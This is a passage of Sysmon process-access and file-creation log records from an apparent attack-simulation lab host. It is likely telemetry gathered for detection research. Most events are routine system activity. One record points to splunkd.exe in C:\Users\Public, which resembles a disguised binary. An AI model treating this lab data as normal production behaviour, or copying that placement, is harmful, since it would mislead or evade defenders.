07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001040A91000}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001040A91000}","TargetProcessId":"796","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.169\r\nSourceProcessGUID: {E2A3D6B1-13A3-5F25-0000-001040A91000}\r\nSourceProcessId: 796\r\nSourceThreadId: 4768\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.169","SourceProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001040A91000}","SourceProcessId":"796","SourceThreadId":"4768","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:59.529\r\nProcessGuid: {E2A3D6B1-13A1-5F25-0000-00100BA21000}\r\nProcessId: 4092\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\System.Workflow.Runtime.dll\r\nCreationUtcTime: 2020-08-01 07:02:59.529","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:59.529","ProcessGuid":"{E2A3D6B1-13A1-5F25-0000-00100BA21000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\System.Workflow.Runtime.dll","CreationUtcTime":"2020-08-01 07:02:59.529","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.607\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-001083780F00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.607","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-001083780F00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.607\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-001083780F00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.607","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-001083780F00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.607\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-001083780F00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.607","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-001083780F00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.654\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.654","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.748\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001091B11000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.748","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001091B11000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.748\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001091B11000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 